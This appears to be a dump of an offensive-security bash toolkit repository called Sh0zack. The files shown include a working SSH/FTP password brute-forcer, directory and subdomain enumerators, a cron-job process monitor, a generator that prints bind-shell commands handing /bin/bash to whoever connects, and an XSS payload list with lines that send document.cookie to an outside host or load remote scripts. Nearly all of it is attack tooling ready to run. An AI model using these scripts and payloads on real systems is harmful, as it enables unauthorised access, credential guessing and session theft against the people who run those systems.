├── scripts
    ├── .gitignore
    ├── install.sh
    └── get-wordlists.sh
├── payloads
    ├── sqli
    │   ├── .gitkeep
    │   └── sql.txt
    └── xss
    │   ├── .gitkeep
    │   └── xss.txt
├── assests
    └── 67732f97-297a-4048-9dc5-f64dad5c009c.png
├── tools
    ├── monitor-cronjob.sh
    ├── webcrawler.sh
    ├── brute-force.sh
    ├── dir.sh
    ├── dns.sh
    ├── listener.sh
    ├── privesc.sh
    ├── port-scanner.sh
    ├── ai.sh
    ├── shell-generator.sh
    └── default_subdomains.txt
├── Readme.md
└── sh0zack.sh


/scripts/.gitignore:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/payloads/sqli/.gitkeep:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/payloads/xss/.gitkeep:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/assests/67732f97-297a-4048-9dc5-f64dad5c009c.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sh0z3n/Sh0zack/HEAD/assests/67732f97-297a-4048-9dc5-f64dad5c009c.png


--------------------------------------------------------------------------------
/tools/monitor-cronjob.sh:
--------------------------------------------------------------------------------
1 | for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm /tmp/monprocs.tmp;
2 | 


--------------------------------------------------------------------------------
/tools/webcrawler.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | #that's a reaaaaly limited web crawler , it is used only for small exposed sites ( won`t work with all sites )
 3 | read -p "$(echo -e '\e[5m'"${BLUE} Set the URL to crawl ${RESET}"'\e[0m')" START_URL
 4 | 
 5 | MAX_DEPTH=5
 6 | VISITED_FILE="vis-urls.txt"
 7 | 
 8 | > "$VISITED_FILE"
 9 | 
10 | crawl_page() {
11 |     local url=$1
12 |     local depth=$2
13 | 
14 |     if grep -Fxq "$url" "$VISITED_FILE"; then
15 |         return
16 |     fi
17 | 
18 |     echo "$url" >> "$VISITED_FILE"
19 | 
20 |     local html_content=$(curl -s "$url")
21 | 
22 |     local links=$(echo "$html_content" | grep -oP '(?<=href=")[^"]+' | grep -E '^https?://')
23 | 
24 |     echo "Crawling $url at depth $depth"
25 | 
26 |     if [ "$depth" -ge "$MAX_DEPTH" ]; then
27 |         return
28 |     fi
29 | 
30 |     for link in $links; do
31 |         crawl_page "$link" $((depth + 1))
32 |     done
33 | }
34 | 
35 | crawl_page "$START_URL" 0
36 | 
37 | echo "Crawling completed. Visited URLs are saved in $VISITED_FILE."
38 | 


--------------------------------------------------------------------------------
/tools/brute-force.sh:
--------------------------------------------------------------------------------
  1 | #! /bin/bash
  2 | 
  3 | error() {
  4 |     echo "Usage :$0 -t <target> -u <wordlist-users> -p <pass-wordlist> -T <threads> -s <service> [-P <port> -o <Output file> ]"
  5 |     exit 1
  6 |     echo "Example : $0 -t 192.159.11.2 -p pass.txt - u user.txt -T 30 -s ssh -P 22 -o hh.txt"
  7 | }
  8 | 
  9 | while getopts "t:u:T:p:o:s:" opt; do
 10 |     case $opt in
 11 | 
 12 |         t ) TARGET=$OPTARG ;;
 13 |         u) USERLIST=$OPTARG ;;
 14 |         p) PASSLIST=$OPTARG ;;
 15 |         T) THREADS=$OPTARG ;;
 16 |         s) SERVICE=$OPTARG ;;
 17 |         P) PORT=$OPTARG ;;
 18 |         o) OUTPUT_FILE=$OPTARG ;;
 19 |         *) usage ;;
 20 | 
 21 |     esac
 22 | 
 23 | done
 24 | 
 25 | 
 26 | if [ -z "$TARGET" ] || [ -z "$USERLIST" ] || [ -z "$PASSLIST" ] || [ -z "$THREADS" ] || [ -z "$SERVICE" ]; then
 27 |     error
 28 | fi
 29 | 
 30 | if [ -n "$OUTPUT_FILE" ]; then
 31 |     : > "$OUTPUT_FILE"
 32 | fi
 33 | 
 34 | 
 35 | if [ -z "$PORT" ]; then
 36 |     if [ "$SERVICE" == "ssh" ]; then
 37 |         PORT=22
 38 |     elif [ "$SERVICE" == "ftp" ]; then
 39 |         PORT=21
 40 |     else
 41 |         echo "Unsupported service: $SERVICE. Only 'ssh' and 'ftp' are supported."
 42 |         exit 1
 43 |     fi
 44 | fi
 45 | 
 46 | ssh_brute() {
 47 |     local user=$1
 48 |     local pass=$2
 49 |     sshpass -p "$pass" ssh -o StrictHostKeyChecking=no -o ConnectTimeout=5 "$user@$TARGET" -P $PORT     exit 2>/dev/null
 50 |       if [ $? -eq 0 ]; then
 51 |         echo "Success: $user:$pass" >> "$OUTPUT_FILE"
 52 |         echo "Success: $user:$pass"
 53 |     fi
 54 | }
 55 | 
 56 | 
 57 | ftp_brute() {
 58 |     local user=$1
 59 |     local pass=$2
 60 |     curl -s --ftp-ssl -u "$user:$pass" "ftp://$TARGET:$PORT/" >/dev/null
 61 |             if [ $? -eq 0 ]; then
 62 |         echo "Success: $user:$pass" >> "$OUTPUT_FILE"
 63 |         echo "Success: $user:$pass"
 64 |     fi
 65 | 
 66 | }
 67 | 
 68 | echo "Starting brute force"
 69 | echo "Target: $TARGET"
 70 | echo "Userlist: $USERLIST"
 71 | echo "Passlist: $PASSLIST"
 72 | echo "Threads: $THREADS"
 73 | echo "Service: $SERVICE"
 74 | echo "Port: $PORT"
 75 | 
 76 | 
 77 | 
 78 | users=($(cat "$USERLIST"))
 79 | passwords=($(cat "$PASSLIST"))
 80 | 
 81 | 
 82 | for i in  "${users[@]}"; do
 83 |     for j in "${passwords[@]}"; do
 84 |         while [ "$(jobs | wc -l)" -ge "$THREADS" ]; do
 85 |             sleep 0.0001
 86 |             done
 87 | 
 88 |         if [ "$SERVICE" == "ssh" ]; then
 89 |             ssh_brute "$i" "$j" &
 90 |         elif [ "$SERVICE" == "ftp" ]; then
 91 |             ftp_brute "$i" "$j" &
 92 |         fi
 93 |     done
 94 | done
 95 | 
 96 | wait
 97 | 
 98 | echo "Brute force is done"
 99 | 
100 | 
101 | 
102 | 


--------------------------------------------------------------------------------
/tools/dir.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # Color definitions
 4 | R='\033[0;31m'
 5 | G='\033[0;32m'
 6 | Y='\033[1;33m'
 7 | B='\033[0;34m'
 8 | M='\033[0;35m'
 9 | C='\033[0;36m'
10 | W='\033[1;37m'
11 | RST='\033[0m'
12 | 
13 | url=""
14 | wordlist=""
15 | output_file=""
16 | threads=50
17 | timeout=5
18 | verbose=false
19 | 
20 | usage() {
21 |     echo -e "${Y}Usage: $0 -u <url> -w <wordlist> [OPTIONS]${RST}"
22 |     echo -e "${Y}Example: $0 -u http://example.com -w /path/to/wordlist.txt -o results.txt -t 100 -v${RST}"
23 |     echo ""
24 |     echo -e "${G}Options:${RST}"
25 |     echo -e "  ${B}-u <url>       ${W}Target URL (required)${RST}"
26 |     echo -e "  ${B}-w <wordlist>  ${W}Path to wordlist file (required)${RST}"
27 |     echo -e "  ${B}-o <file>      ${W}Output file (default: dir_results.txt)${RST}"
28 |     echo -e "  ${B}-t <number>    ${W}Number of threads (default: 50)${RST}"
29 |     echo -e "  ${B}-T <seconds>   ${W}Timeout for requests (default: 5)${RST}"
30 |     echo -e "  ${B}-v             ${W}Verbose mode${RST}"
31 |     exit 1
32 | }
33 | 
34 | while getopts "u:w:o:t:T:v" opt; do
35 |     case $opt in
36 |         u) url="$OPTARG" ;;
37 |         w) wordlist="$OPTARG" ;;
38 |         o) output_file="$OPTARG" ;;
39 |         t) threads="$OPTARG" ;;
40 |         T) timeout="$OPTARG" ;;
41 |         v) verbose=true ;;
42 |         *) usage ;;
43 |     esac
44 | done
45 | 
46 | if [ -z "$url" ] || [ -z "$wordlist" ]; then
47 |     usage
48 | fi
49 | 
50 | if [ -z "$output_file" ]; then
51 |     output_file="dir_results.txt"
52 | fi
53 | 
54 | dir_enum() {
55 |     local endpoint="$1"
56 |     local response=$(curl -s -o /dev/null -w "%{http_code}" -m "$timeout" "$url/$endpoint")
57 |     local status=""
58 |     local color=""
59 |     case "$response" in
60 |         200) status="Found"; color=$G ;;
61 |         3*) status="Redirect"; color=$Y ;;
62 |         401) status="Unauthorized"; color=$R ;;
63 |         403) status="Forbidden"; color=$M ;;
64 |         500) status="Server Error"; color=$R ;;
65 |         *) return ;;  # ulach other status codes
66 |     esac
67 |     echo -e "${color}| $(printf "%-50s" "$url/$endpoint") | $(printf "%-15s" "$status ($response)") |${RST}"
68 | }
69 | 
70 | enumerate() {
71 |     local total_lines=$(wc -l < "$wordlist")
72 |     local counter=0
73 |     local start_time=$(date +%s)
74 | 
75 |     echo -e "${W}| Directory                                          | Status          |${RST}"
76 |     echo -e "${W}|----------------------------------------------------|-----------------|${RST}"
77 | 
78 |     export -f dir_enum
79 |     export url timeout verbose
80 |     export R G Y B M C W RST
81 | 
82 |     cat "$wordlist" | xargs -P "$threads" -I {} bash -c 'dir_enum "$@"' _ {} | tee -a >(sed "s/\x1B\[[0-9;]*[JKmsu]//g" > "$output_file")
83 | 
84 |     local end_time=$(date +%s)
85 |     local duration=$((end_time - start_time))
86 | 
87 |     echo -e "${Y}=========================================================================${RST}"
88 |     echo -e "${G}Directory enumeration complete.${RST}"
89 |     echo -e "${B}Total entries processed: ${W}$total_lines${RST}"
90 |     echo -e "${B}Time taken: ${W}$duration seconds${RST}"
91 |     echo -e "${B}Results saved to: ${W}$output_file${RST}"
92 | }
93 | 
94 | echo -e "${M}Starting directory enumeration on $url using wordlist: $wordlist...${RST}"
95 | echo -e "${Y}======================================================================${RST}"
96 | enumerate
97 | 


--------------------------------------------------------------------------------
/scripts/install.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | 
  3 | # Color definitions
  4 | RED='\033[0;31m'
  5 | GREEN='\033[0;32m'
  6 | YELLOW='\033[1;33m'
  7 | BLUE='\033[0;34m'
  8 | RESET='\033[0m'
  9 | BOLD='\033[1m'
 10 | 
 11 | # List of required tools
 12 | TOOLS=(
 13 |     "nmap"
 14 |     "rustscan"
 15 |     "gobuster"
 16 |     "hydra"
 17 |     "wfuzz"
 18 |     "nikto"
 19 |     "wpscan"
 20 |     "curl"
 21 |     "xargs"
 22 |     "jq"
 23 |     "python3-pip"
 24 |     "fold"
 25 |     "bash"
 26 |     "base64" #exhausted to complete other tools , in case you had a installation err , go to reddit or stackoverflow am done with this XD
 27 | )
 28 | 
 29 | # Python packages
 30 | PIP_PACKAGES=(
 31 |     "requests"
 32 |     "beautifulsoup4"
 33 |     "base58"
 34 | )
 35 | 
 36 | get_package_manager() {
 37 |     if command -v apt &>/dev/null; then
 38 |         echo "apt"
 39 |     elif command -v dnf &>/dev/null; then
 40 |         echo "dnf"
 41 |     elif command -v yum &>/dev/null; then
 42 |         echo "yum"
 43 |     elif command -v pacman &>/dev/null; then # shout out to best pacman user samyyy
 44 |         echo "pacman"
 45 |     else
 46 |         echo ""
 47 |     fi
 48 | }
 49 | 
 50 | if [ "$EUID" -ne 0 ]; then 
 51 |     echo -e "${RED}Please run as root${RESET}"
 52 |     exit 1
 53 | fi
 54 | 
 55 | PKG_MANAGER=$(get_package_manager)
 56 | if [ -z "$PKG_MANAGER" ]; then
 57 |     echo -e "${RED}No supported package manager found${RESET}"
 58 |     exit 1
 59 | fi
 60 | 
 61 | case $PKG_MANAGER in
 62 |     "apt")
 63 |         INSTALL_CMD="apt install -y"
 64 |         ;;
 65 |     "dnf")
 66 |         INSTALL_CMD="dnf install -y"
 67 |         ;;
 68 |     "yum")
 69 |         INSTALL_CMD="yum install -y"
 70 |         ;;
 71 |     "pacman")
 72 |         INSTALL_CMD="pacman -S --noconfirm"
 73 |         ;;
 74 | esac
 75 | 
 76 | echo -e "${BLUE}${BOLD}Starting installation of required tools...${RESET}"
 77 | 
 78 | 
 79 | echo -e "${YELLOW}Installing required tools...${RESET}"
 80 | for tool in "${TOOLS[@]}"; do
 81 |     if ! command -v "$tool" &>/dev/null; then
 82 |         echo -e "${BLUE}Installing $tool...${RESET}"
 83 |         if $INSTALL_CMD "$tool"; then
 84 |             echo -e "${GREEN}Successfully installed $tool${RESET}"
 85 |         else
 86 |             echo -e "${RED}Failed to install $tool${RESET}"
 87 |         fi
 88 |     else
 89 |         echo -e "${GREEN}$tool is already installed${RESET}"
 90 |     fi
 91 | done
 92 | 
 93 | if command -v pip3 &>/dev/null; then
 94 |     echo -e "${YELLOW}Installing Python packages...${RESET}"
 95 |     for package in "${PIP_PACKAGES[@]}"; do
 96 |         echo -e "${BLUE}Installing $package...${RESET}"
 97 |         if pip3 install "$package"; then
 98 |             echo -e "${GREEN}Successfully installed $package${RESET}"
 99 |         else
100 |             echo -e "${RED}Failed to install $package${RESET}"
101 |         fi
102 |     done
103 | fi
104 | 
105 | # Install Rustscan if not available in package manager
106 | if ! command -v rustscan &>/dev/null; then
107 |     echo -e "${YELLOW}Installing Rustscan...${RESET}"
108 |     if command -v cargo &>/dev/null; then
109 |         cargo install rustscan
110 |     else
111 |         echo -e "${RED}Cargo not found. Installing rust...${RESET}"
112 |         curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
113 |         source $HOME/.cargo/env
114 |         cargo install rustscan
115 |     fi
116 | fi
117 | 
118 | # Clone additional tools or repositories if needed
119 | TOOLS_DIR="tools"
120 | if [ ! -d "$TOOLS_DIR" ]; then
121 |     mkdir -p "$TOOLS_DIR"
122 | fi
123 | 
124 | echo -e "${GREEN}${BOLD}Installation complete!${RESET}"
125 | echo -e "${YELLOW}Note: Some tools might require additional configuration${RESET}"
126 | 


--------------------------------------------------------------------------------
/tools/dns.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | 
  3 | # Color definitions
  4 | RED='\033[0;31m'
  5 | GREEN='\033[0;32m'
  6 | YELLOW='\033[0;33m'
  7 | BLUE='\033[0;34m'
  8 | MAGENTA='\033[0;35m'
  9 | CYAN='\033[0;36m'
 10 | NC='\033[0m' # No Color
 11 | 
 12 | custom_url=""
 13 | wordlist=""
 14 | output_file=""
 15 | threads=50
 16 | timeout=5
 17 | resolve_ip=true
 18 | verbose=false
 19 | 
 20 | usage() {
 21 |     echo -e "${BLUE}Usage: $0 -u <url> -w <wordlist> [OPTIONS]${NC}"
 22 |     echo -e "Example: $0 -u example.com -w subdomains.txt -o results.txt -t 100 -v"
 23 |     echo -e "\nOptions:"
 24 |     echo -e "  -u <url>       Target URL (required)"
 25 |     echo -e "  -w <wordlist>  Path to wordlist file (required)"
 26 |     echo -e "  -o <file>      Output file (default: subdomain_results.txt)"
 27 |     echo -e "  -t <number>    Number of threads (default: 50)"
 28 |     echo -e "  -T <seconds>   Timeout for DNS queries (default: 5)"
 29 |     echo -e "  -n             Do not resolve IP addresses"
 30 |     echo -e "  -v             Verbose mode"
 31 |     exit 1
 32 | }
 33 | 
 34 | # Parse command-line arguments
 35 | while getopts "u:w:o:t:T:nv" opt; do
 36 |     case $opt in
 37 |         u) custom_url="$OPTARG" ;;
 38 |         w) wordlist="$OPTARG" ;;
 39 |         o) output_file="$OPTARG" ;;
 40 |         t) threads="$OPTARG" ;;
 41 |         T) timeout="$OPTARG" ;;
 42 |         n) resolve_ip=false ;;
 43 |         v) verbose=true ;;
 44 |         *) usage ;;
 45 |     esac
 46 | done
 47 | 
 48 | if [ -z "$custom_url" ] || [ -z "$wordlist" ]; then
 49 |     usage
 50 | fi
 51 | 
 52 | if [ -z "$output_file" ]; then
 53 |     output_file="shozack-subdomain_results.txt"
 54 | fi
 55 | 
 56 | #  URL has a protocol
 57 | if [[ "$custom_url" != http://* && "$custom_url" != https://* ]]; then
 58 |     custom_url="http://$custom_url"
 59 | fi
 60 | 
 61 | domain=$(echo "$custom_url" | awk -F[/:] '{print $4}')
 62 | 
 63 | check_wordlist() {
 64 |     if [ ! -f "$wordlist" ]; then
 65 |         echo -e "${YELLOW}Wordlist not found. Downloading from $custom_url...${NC}"
 66 |         curl -sSL "$custom_url" -o "$wordlist"
 67 |         if [ $? -ne 0 ]; then
 68 |             echo -e "${RED}Failed to download wordlist. Exiting.${NC}"
 69 |             exit 1
 70 |         fi
 71 |     else
 72 |         echo -e "${GREEN}Using existing wordlist: $wordlist${NC}"
 73 |     fi
 74 | }
 75 | 
 76 | dns_enum() {
 77 |     local subdomain="$1"
 78 |     local full_domain="$subdomain.$domain"
 79 |     local result=""
 80 | 
 81 |     if $resolve_ip; then
 82 |         result=$(timeout $timeout host "$full_domain" 2>/dev/null | grep 'has address' | head -n 1)
 83 |         if [ -n "$result" ]; then
 84 |             local ip=$(echo "$result" | awk '{print $NF}')
 85 |             echo -e "$full_domain : $ip"
 86 |         elif $verbose; then
 87 |             echo "$full_domain,No IP" >&2
 88 |         fi
 89 |     else
 90 |         if timeout $timeout host "$full_domain" 2>/dev/null | grep -q 'has address'; then
 91 |             echo "$full_domain"
 92 |         elif $verbose; then
 93 |             echo "$full_domain,Not found" >&2
 94 |         fi
 95 |     fi
 96 | }
 97 | 
 98 | export -f dns_enum
 99 | export resolve_ip
100 | export verbose
101 | export timeout
102 | export domain
103 | 
104 | print_banner() {
105 |     echo -e "${MAGENTA}"
106 |     echo "============================================"
107 |     echo "   Sh0zack Advanced DNS Subdomain Enumerator"
108 |     echo "============================================"
109 |     echo -e "${NC}"
110 |     echo -e "${CYAN}Target URL:${NC} $custom_url"
111 |     echo -e "${CYAN}Wordlist:${NC} $wordlist"
112 |     echo -e "${CYAN}Output File:${NC} $output_file"
113 |     echo -e "${CYAN}Threads:${NC} $threads"
114 |     echo -e "${CYAN}Timeout:${NC} $timeout seconds"
115 |     echo -e "${CYAN}Resolve IP:${NC} $resolve_ip"
116 |     echo -e "${CYAN}Verbose:${NC} $verbose"
117 |     echo "============================================"
118 | }
119 | 
120 | main() {
121 |     print_banner
122 |     check_wordlist
123 | 
124 |     echo -e "${GREEN}Starting enumeration...${NC}"
125 |     start_time=$(date +%s)
126 | 
127 |     xargs -P $threads -I {} -a "$wordlist" bash -c 'dns_enum "$@"' _ {} | tee "$output_file"
128 | 
129 |     end_time=$(date +%s)
130 |     duration=$((end_time - start_time))
131 | 
132 |     subs=$(wc -l < "$output_file")
133 | 
134 |     echo -e "\n${GREEN}Enumeration complete!${NC}"
135 |     echo -e "${CYAN}Total subdomains found:${NC} $subs"
136 |     echo -e "${CYAN}Time taken:${NC} $duration seconds"
137 |     echo -e "${CYAN}Results saved to:${NC} $output_file"
138 | }
139 | 
140 | main
141 | 


--------------------------------------------------------------------------------
/tools/listener.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | 
  3 | GREEN='\033[0;32m'
  4 | YELLOW='\033[1;33m'
  5 | CYAN='\033[0;36m'
  6 | RED='\033[0;31m'
  7 | RESET='\033[0m'
  8 | 
  9 | open_listener() {
 10 |     local l=$1
 11 |     local ip=$2
 12 |     local port=$3
 13 | 
 14 |     case "$l" in
 15 |         "Netcat")
 16 |             echo "nc -lvnp $port"
 17 |             ;;
 18 |         "Netcat (with -e support)")
 19 |             echo "nc -lvnp $port -e /bin/bash"
 20 |             ;;
 21 |         "Python")
 22 |             echo "python -c \"import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(('$ip',$port));s.listen(1);conn,addr=s.accept();os.dup2(conn.fileno(),0);os.dup2(conn.fileno(),1);os.dup2(conn.fileno(),2);subprocess.call(['/bin/bash','-i'])\""
 23 |             ;;
 24 |         "Python3")
 25 |             echo "python3 -c \"import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(('$ip',$port));s.listen(1);conn,addr=s.accept();os.dup2(conn.fileno(),0);os.dup2(conn.fileno(),1);os.dup2(conn.fileno(),2);subprocess.call(['/bin/bash','-i'])\""
 26 |             ;;
 27 |         "Socat")
 28 |             echo "socat TCP-LISTEN:$port,reuseaddr,fork EXEC:/bin/bash,pty,stderr,setsid,sigint,sane"
 29 |             ;;
 30 |         "Powercat")
 31 |             echo "powercat -l -p $port -v -t 1000"
 32 |             ;;
 33 |         "Rlwrap Netcat")
 34 |             echo "rlwrap nc -lvnp $port"
 35 |             ;;
 36 |         "Pwncat")
 37 |             echo "python3 -m pwncat -lp $port"
 38 |             ;;
 39 |         "Rustcat")
 40 |             echo "rcat listen -p $port"
 41 |             ;;
 42 |         "Metasploit")
 43 |             echo "msfconsole -q -x \"use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST $ip; set LPORT $port; run\""
 44 |             ;;
 45 |         "OpenSSL")
 46 |             echo "openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && openssl s_server -quiet -key key.pem -cert cert.pem -port $port"
 47 |             ;;
 48 |         "Ncat (SSL)")
 49 |             echo "ncat --ssl -lvnp $port"
 50 |             ;;
 51 |         "PHP")
 52 |             echo "php -S $ip:$port"
 53 |             ;;
 54 |         "Ruby")
 55 |             echo "ruby -rsocket -e 'Socket.new(2,1,6).bind(Socket.sockaddr_in($port,\"$ip\")).listen(1).accept.each_line{|l|puts l;IO.popen(l.chomp,\"r\"){|p|puts(p.readline)}}.close'"
 56 |             ;;
 57 |         "Perl")
 58 |             echo "perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));bind(S,sockaddr_in($port,INADDR_ANY));listen(S,SOMAXCONN);while(1){accept(C,S);if(!fork()){exec(\"/bin/bash -i <&3 >&3 2>&3\")}}'"
 59 |             ;;
 60 |         *)
 61 |             echo -e "${RED}Listener type not supported: $l${RESET}"
 62 |             ;;
 63 |     esac
 64 | }
 65 | 
 66 | menu() {
 67 |     lista=("Netcat" "Netcat (with -e support)" "Python" "Python3" "Socat" "Powercat" 
 68 |              "Rlwrap Netcat" "Pwncat" "Rustcat" "Metasploit" "OpenSSL" "Ncat (SSL)" 
 69 |              "PHP" "Ruby" "Perl" "Exit")
 70 |     for i in "${!lista[@]}"; do
 71 |         echo "$((i + 1)). ${lista[i]}"
 72 |     done
 73 | }
 74 | 
 75 | while true; do
 76 |    menu
 77 |     echo -e "${YELLOW}Open a Listener <Sh0zack> ${RESET}"
 78 | 
 79 |     read -p "Enter your choice: " choice
 80 | 
 81 |     case $choice in
 82 |         1)
 83 |             l="Netcat"
 84 |             ;;
 85 |         2)
 86 |             l="Netcat (with -e support)"
 87 |             ;;
 88 |         3)
 89 |             l="Python"
 90 |             ;;
 91 |         4)
 92 |             l="Python3"
 93 |             ;;
 94 |         5)
 95 |             l="Socat"
 96 |             ;;
 97 |         6)
 98 |             l="Powercat"
 99 |             ;;
100 |         7)
101 |             l="Rlwrap Netcat"
102 |             ;;
103 |         8)
104 |             l="Pwncat"
105 |             ;;
106 |         9)
107 |             l="Rustcat"
108 |             ;;
109 |         10)
110 |             l="Metasploit"
111 |             ;;
112 |         11)
113 |             l="OpenSSL"
114 |             ;;
115 |         12)
116 |             l="Ncat (SSL)"
117 |             ;;
118 |         13)
119 |             l="PHP"
120 |             ;;
121 |         14)
122 |             l="Ruby"
123 |             ;;
124 |         15)
125 |             l="Perl"
126 |             ;;
127 |         16)
128 |             exit 0
129 |             ;;
130 |         *)
131 |             echo -e "${RED}Invalid choice, please try again.${RESET}"
132 |             continue
133 |             ;;
134 |     esac
135 | 	
136 |     read -p "Enter IP address: " ip
137 |     read -p "Enter port number: " port
138 | 
139 |     cmd=$(open_listener "$l" "$ip" "$port")
140 |     echo -e "${YELLOW}Listener command:${RESET}"
141 |     echo -e "${CYAN}$cmd${RESET}"
142 |     read -p "Press any key to continue..."
143 | done
144 | 


--------------------------------------------------------------------------------
/payloads/xss/xss.txt:
--------------------------------------------------------------------------------
  1 | <script>alert(1)</script>
  2 | <Script>alert(1)</Script>
  3 | <sCript>alert(document.domain)</sCript>
  4 | <script>alert(123);</script>
  5 | <script>alert("test");</script>
  6 | <script>alert(document.cookie)</script>
  7 | </script><script>alert(document.cookie)</script>
  8 | javascript:alert(document.cookie)
  9 | javascript:prompt(document.cookie)
 10 | '-alert(document.cookie)-'
 11 | </script><svg onload=alert(document.cookie)>
 12 | "onmouseover=alert(document.cookie)//
 13 | {{$on.constructor('alert(1)')()}}
 14 | <Script>alert(document.cookie)</Script>
 15 | <sCript>alert(document.domain)</sCript>
 16 | <script>alert(document.cookie);</script>
 17 | <script>alert(document.cookie);</script>
 18 | <script>alert(document.domain)</script>
 19 | <script>alert(document.cookie)</script>
 20 | <script>new Image().src="http://192.168.1.6/?c="+document.cookie;</script>
 21 | <script>var i=new Image; i.src="http://192.168.1.6/?"+document.cookie;</script>
 22 | </script><script>alert(1)</script>
 23 | <img src="abc" onerror="alert(1)">
 24 | <img src="" onerror="alert(document.cookie)">
 25 | <img src='x' onerror='alert(document.cookie)' />
 26 | &lt;img src=0 onerror=alert(&#39;1&#39;)&gt;
 27 | &lt;img src=0 onerror=alert(document.cookie)&gt;
 28 | <svg/onload=alert(1)>
 29 | "><svg onload=alert(1)>
 30 | ';alert('1');'
 31 | ';alert('abc');'
 32 | <sc<script>ript>alert(1)</sc</script>ript>
 33 | <BODY ONLOAD=alert('1')>
 34 | <marquee onstart=alert(1)></marquee>
 35 | <audio src/onerror=alert(1)>
 36 | <audio src/onerror=prompt(123)>
 37 | <audio src/onerror=confirm(123)>
 38 | <script src="http://192.168.1.6/test.js" ></script>
 39 | <body onload=alert(123) >
 40 | <body onload=confirm(123) >
 41 | <body onload=prompt(123) >
 42 | --><svg/onload=alert(document.domain)>
 43 | --><body onload=alert(123) >
 44 | --><script>alert(1)</script>
 45 | --><img src=x onerror=alert('test')>
 46 | --><img src=x onerror=alert(document.domain)>
 47 | --><img src=x onerror=alert(document.cookie)>
 48 | --><img src=x onerror=prompt(document.domain)>
 49 | --><img src=x onerror=confirm(document.domain)>
 50 | <iframe src='https://testforiframe.site/'>
 51 | "><iframe src='https://testforiframe.site/'>
 52 | "><script src="https://testforiframe.site/"></script>
 53 | "><script>alert(document.domain)</script>
 54 | "><script>alert(document.domain + '\n' + "1")</script>
 55 | "><script>alert(document.domain + '\n' + "Name")</script>
 56 | "<img src='x' onerror='alert(10)' />"
 57 | https://brutelogic.com.br/poc.svg
 58 | http://xss.rocks/scriptlet.html
 59 | javascript:alert(document.cookie)
 60 | poc.svg = <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
 61 | "><script>alert(1)</script>
 62 | 'or<script>alert(1)</script>
 63 | 'or<img src=0 onerror=alert('1')>
 64 | <script <script>>alert('test')</script>  
 65 | <audio src/onerror=alert('test')>
 66 | <iframe src=javascript:alert('test')>
 67 | <iframe src="javascript:alert(test)">
 68 | <img src=x onerror=alert(test)>
 69 | ';alert(test); //
 70 | <body onmouseover="print()">
 71 | <body onclick=print()>
 72 | <body onmessage=print()>
 73 | <iframe onload=print()></iframe>
 74 | <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
 75 | <IMG SRC="javascript:alert('XSS');">
 76 | <IMG SRC=javascript:alert('XSS')>
 77 | <IMG SRC=JaVaScRiPt:alert('XSS')>
 78 | <IMG SRC=javascript:alert(&quot;XSS&quot;)>
 79 | <IMG """><SCRIPT>alert(document.cookie)</SCRIPT>"\>
 80 | <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
 81 | <IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
 82 | <img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
 83 | <<SCRIPT>alert(document.cookie);//\<</SCRIPT>>
 84 | <iframe src=http://xss.rocks/scriptlet.html <
 85 | </script><script>alert(document.cookie);</script>
 86 | </TITLE><SCRIPT>alert(document.cookie);</SCRIPT>
 87 | <BODY ONLOAD=alert(document.cookie)>
 88 | <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
 89 | <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
 90 | <OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/scriptlet.html"></OBJECT>
 91 | <script>'-alert(1)-'</script>
 92 | '-alert(1)-'
 93 | ></select><img%20src=1%20onerror=alert(1)>
 94 | {{$on.constructor('alert(1)')()}}
 95 | \"-alert(1)}//
 96 | <img src=1 onerror=print()>
 97 | "-top['al\x65rt']('sailay')-" 
 98 | <pre id=p style=background:#000><svg onload='setInterval(n=>{for(o=t++,i=476;i--;o+=i%30?("0o"[c=0|(h=v=>(M=Math).hypot(i/30-8+3*M.sin(t/8/v),i%30/2-7+4*M.cos(t/9/v)))(7)*h(9)*h(6)/32]||".").fontcolor(c>2):"\n");p.innerHTML=o},t=1)'>
 99 | <img src="" onerror="innerHTML=decodeURIComponent.call`${location.hash}`" "="">
100 | <img src="" onerror="location=/javascript:/.source+location" "="">
101 | <img src="" onerror="window.onerror=alert;throw 1337" "="">
102 | <img src="" onerror="alert&1par;1337&rpar;" "="">
103 | <img src="" onerror="alert`1337`" "="">
104 | javascript:alert(document.cookie)
105 | "><img src=x onerror=alert(document.domain)>
106 | "><script>alert(1)</script>
107 | "><script>alert(document.domain)</script>
108 | "><script>alert(document.cookie)</script>
109 | "><script>prompt(1)</script>
110 | "><script>prompt(document.domain)</script>
111 | "><script>prompt(document.cookie)</script>
112 | "><svg><script>alert(1)</script>
113 | ?s="onerror="innerHTML=decodeURIComponet.call`${location.hash}`"#<img src onerror=alert(1337)>
114 | ?s="onerror="location=/javascript:/.source%2Blocation"&a=%0A+alert(1337)
115 | ?s="onerror="window.onerror=alert;throw 1337"
